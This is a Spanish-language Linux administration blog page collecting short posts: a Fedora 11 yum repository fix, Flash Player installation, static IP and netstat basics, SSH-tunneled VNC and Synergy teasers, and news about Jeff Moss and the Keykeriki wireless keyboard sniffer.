Pues si mis estimados "Fedoritas", su última versión 11 a.k.a. "Leonidas" se ve muy bien, la verdad, fácil instalación, rápida, pero... (siempre tiene que haber uno) al momento de querer actualizar a Leonidas con un yum:

#yum update

Aparecia el siguiente error:

Loaded plugins: refresh-packagekit
Error: Cannot retrieve repository metadata (repomd.xml) for repository: fedora. Please verify its path and try again

Si, después de revisar que todo estuviera bien configurado y un poco de troubleshooting di con la siguiente solución.

Editar los archivos .repo de la carpeta /etc/yum.repos.d/ y comentar todas las líneas de mirrorlist y descomentar las de baseurl.

Por ejemplo deben de quedar así:

[fedora]
name=Fedora $releasever - $basearch
failovermethod=priority
baseurl=http://download.fedoraproject.org/pub/fedora/linux/releases/$releasever/Everything/$basearch/os/
#mirrorlist=https://mirrors.fedoraproject.org/metalink?repo=fedora-$releasever&arch=$basearch
enabled=1
metadata_expire=7d
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora-$basearch

[fedora-debuginfo]
name=Fedora $releasever - $basearch - Debug
failovermethod=priority
baseurl=http://download.fedoraproject.org/pub/fedora/linux/releases/$releasever/Everything/$basearch/debug/
#mirrorlist=https://mirrors.fedoraproject.org/metalink?repo=fedora-debug-$releasever&arch=$basearch
enabled=0
metadata_expire=7d
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora-$basearch

[fedora-source]
name=Fedora $releasever - Source
failovermethod=priority
baseurl=http://download.fedoraproject.org/pub/fedora/linux/releases/$releasever/Everything/source/SRPMS/
#mirrorlist=https://mirrors.fedoraproject.org/metalink?repo=fedora-source-$releasever&arch=$basearch
enabled=0
metadata_expire=7d
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-fedora-$basearch

Y listo, ya podran actualizar su Leonidas sin problemas, si desean ese baseurl lo pueden cambiar a un mirror que este cerca de su localidad.

[método rápido para tener actualizado nuestro equipo]

Fundador de Defcon directo al Consejo de Homeland Security de USA

Bueno, antes que nada hay que conocer a Jeff Moss:

Conocido con el sobrenombre de Dark Tangent, es el fundador de las conocidas conferencias hacker Defcon y BlackHat en las cuales se reunen año con año hackers de todo el mundo para compartir sus experiencias, mostrar nuevos trucos de hackeo, jugar e incluso realizar una parrillada. Estas conferencias son reconocidas a nivel mundial, en el caso de Defcon se realiza en Las Vegas Nevada USA, BlackHat en Europa, Japón y USA (Es hermano de Defcon).

Bueno, ya conocimos un poco a Jeff Moss ahora, ¿Qué es el Homeland Security Advisory Council?:
"Provee avisos y recomendaciones a la secretaría en cuestiones relacionadas a la seguridad de la patria. El consejo esta formado por lideres locales y de estado del gobierno, comunidades de respuesta inmediata, sector privado y academias."

O sea que este consejo da sus puntos de vista al Homeland Security Department en cuanto a la seguridad de la nación.

Entonces ya sabemos quien es Jeff Moss, que es el HSAC, incluso podemos saber quienes son los miembros de tal consejo.

En una entrevista el 5 de junio de 2009 a Jeff Moss el menciono lo siguiente:

"Se que hay un nuevo enfasis en ciberseguridad y estan buscando diversificar los miembros para tener puntos de vista alternativos", "Creo que necesitan el punto de vista de gente externa escéptica, porque eso es lo que ha estado faltando".

Muy bien, hasta que el gobierno de USA entro en razón y puso en su consejo de seguridad nacional a un lider de la comunidad hacker, los recursos de Jeff Moss le haran bien a la nación, ojala en México existiera algo parecido :D.

Wireless Keyboard Sniffing

Yes!, si creian que estaban a salvo con sus teclados y mouse wireless pues les tengo una noticia... ¡ya existe un sniffer para teclados wireless!.

Claro que si, [voz de presentador de peliculas de cine] Del estudio que trajo a ustedes Backtrack, creadores de los cursos de Offensive Security y hackers profesionales traen para ustedes Keykeriki!!!!![/voz de presentador de peliculas de cine].

¿Keykeriki?, wtf!!!!?
Como ellos lo explican, es un simple juego de palabras con la palabra key (llave) y el cantar del gallo (rooster), lo cual se les hizo gracioso y asi quisieron bautizar su proyecto (si, cuando un proyecto es tuyo le puedes poner como se te de la regalada gana).

En la página nos muestra un video para poder ver con nuestros propios ojos que lo que se escribe en el teclado wireless se esta capturando en una terminal de forma remota (wireless) duh!.

El equipo de remote exploit va a vender placas PCB ya hechas con los componentes necesarios muy pronto.

Ahora si, tendras tu "keylogger" wireless!!!

Instalar FlashPlayer en GNU/Linux

Instalar FlashPlayer en varias distros de GNU/Linux

Tal como su nombre lo dice, como instalar flashplayer en algunas distros de uso común, esto es para que puedan ver sus tutoriales, youtube, etc.

En CentOS/RedHat

Ir a http://www.adobe.com/go/getflashplayer

Bajar el tar.gz tarball

$ tar -zxf Flash_Player_10_for_Linux_.tar.gz

$ cd Flash_Player_10_for_Linux

# ./flashplayer-installer

Ejecutar el instalador, cuando pregunte por la ruta de Firefox escribimos /usr/lib/mozilla…

Si no funciona adecuadamente por alguna extraña razón podemos copiar manualmente el archivo libflashplayer.so al directorio /usr/lib/mozilla/plugins/

# cp libflashplayer.so /usr/lib/mozilla/plugins/

Una vez copiado ejecutamos firefox y entramos a youtube para verificar.

En Ubuntu (Multiverse Repo)

$ sudo apt-get install flashplugin-nonfree

En OpenSUSE, Slackware y Mandriva

$ cd install_flash_player_10_linux

$~/install_flash_player_10_linux> ./flashplayer-installer

Copyright(C) 2002-2006 Adobe Macromedia Software LLC.  All rights reserved.

Adobe Flash Player 10 for Linux

Adobe Flash Player 10 will be installed on this machine.

You are running the Adobe Flash Player installer as a non-root user.

Adobe Flash Player 10 will be installed in your home directory.

Support is available at http://www.adobe.com/support/flashplayer/

To install Adobe Flash Player 10 now, press ENTER.

To cancel the installation at any time, press Control-C.

NOTE: Please exit any browsers you may have running.

Press ENTER to continue…

———– Install Action Summary ———–

Adobe Flash Player 10 will be installed in the following directory:

Mozilla installation directory  = /home/israel/.mozilla

Proceed with the installation? (y/n/q): y

NOTE: Please ask your administrator to remove the xpti.dat from the
components directory of the Mozilla or Netscape browser.

Installation complete.

Perform another installation? (y/n): n

En Fedora 9 y 10

$ sudo rpm -ivh http://linuxdownload.adobe.com/adobe-release/adobe-release-i386-1.0-1.noarch.rpm

$ sudo yum install flash-plugin

Eso es todo!

Instalando Nagios 3.1.0 en CentOS 5.3

Pues como dicen, a falta de pan tortilla, ayer no pude poner un blog por que estuve muy ocupado, por lo cual hoy pondre uno de "backup" :D.

Nagios es un sistema para monitorear equipos y servicios muy útil, con este pequeño how to podrán instalarlo en un CentOS 5.3 [more...]

Como configurar una IP statica en Ubuntu a la Fast and Furious

It's n00b time!, ayer estaba utilizando Backtrack 4 (Basado en Ubuntu) y como es Beta como que no funcionan algunas cosillas al 100% todavia, como en el caso de configurar la IP con el Network Manager por lo cual lo tuve que configurar a la Fast and Furious Style:
NOTA: Se utilizaran valores ficticios y el lector los tiene que cambiar a su configuración real.

Editamos el archivo de configuración /etc/network/interfaces:

# vim /etc/network/interfaces

cambiar esto

iface eth0 inet dhcp

por esto

iface eth0 inet static
address 192.168.1.100
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.254

Grabamos y cerramos el archivo.

Reiniciamos el servicio de red:

#/etc/init.d/networking restart

Despues definimos nuestros servidores DNS:

#vim /etc/resolv.conf

Y agregamos lo siguiente:

search midominio.com
nameserver 192.168.1.160
nameserver 200.200.200.201

Grabamos y cerramos el archivo.

Verificamos que funcione nuestro servidor DNS

# host google.com

Command Line Cheat Sheet (Ubuntuland)

Ver la configuración de la interfaz de red

$ ifconfig

Deshabilitar una interfaz de red (eth0)

$ sudo ifconfig eth0 down

$ sudo ifdown eth0

Habilitar una interfaz de red (eth0)

$ sudo ifconfig eth0 up

$ sudo ifup eth0

Cambiar la dirección IP y la mascara desde la linea de comandos

$ sudo ifconfig eth0 192.168.1.50 netmask 255.255.255.0 up

Desplegar la tabla de rutas

$ /sbin/route

o

$ /sbin/route -n

Salida:

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
localnet        *               255.255.255.0   U     0      0        0 ra0
172.16.114.0    *               255.255.255.0   U     0      0        0 eth0
172.16.236.0    *               255.255.255.0   U     0      0        0 eth1
default         192.168.1.254   0.0.0.0         UG    0      0        0 ra0

Agregar un nuevo gateway

$ sudo route add default gw 172.16.236.0

Desplegar las conexiones activas al Internet (servidores y conexiones establecidas)

$ netstat -nat

Desplegar puertos abiertos

$ sudo netstat -tulp

o

$ sudo netstat -tulpn

Desplegar estadisticas de las interfaces de red (RX/TX)

$ netstat -i

Desplegar la salida de conexiones activas y establecidas solamente.

$ netstat -e
$ netstat -te
$ netstat -tue

Donde,

 * -t : TCP
   * -u : UDP
   * -e : Establecida

Probando la conexión a la red

Enviar ICMP ECHO_REQUEST a equipos, servidores, etc. con el comando ping, esto verifica si existe conextividad entre nuestro equipo y un equipo remoto:

$ ping servidor
$ ping 192.168.1.254
$ ping google.com

Utilizar la herramienta de configuración de red gráfica (GUI):

$ network-admin &

Eso todo...

Configurando Synergy (Windows+Linux) usando SSH

Aqui explicare como configurar Synergy usando Windows XP como servidor y Linux Ubuntu como cliente comunicandose de manera encriptada por medio de SSH, *cough* Freak! *cough*. [more...]

VNC con SSH Tunneling

Si, VNC! ¿y?, mucha gente lo utiliza y si lo usan pues minimo que sea con un poco de seguridad...

Aqui esta un pequeño How to para tener VNC con SSH tunneling:

pregunta n00b: por que necesito tener VNC con SSH tunneling?

tel otro n00b contesta: Por que tal vez alguien ("usuarios con iniciativa", script kiddies, etc.) pueden utilizar herramientas para realizar attaques de man-in-the-middle (MITM) para sniffear el trafico de tu red y asi obtener la contraseña de tu servidor VNC en simple texto plano . Tip - Cain. [more...]

Detectando "Rogue Wireless" en la red cableada

Pues si, a veces no sabemos a quien le damos acceso a nuestra red interna o a Internet "per free" con el uso de access points aka wifi, por lo cual hoy toca el tema de como detectar Rogue Wireless por medio de la red cableada o sea Wired. [more]

RHEL - CentOS Tranformación y Actualización

Se deseaba actualizar un servidor RedHat Enterprise Linux 4 a CentOS 5.3, ya que el usuario para actualizar el RHEL con RHN no se tiene (no se supo donde quedo), por lo cual el RHEL no se podria actualizar.
[more...]

Haciendo un "Caliz" del Planet.gultij.org

Super caliz del planet.gultij.org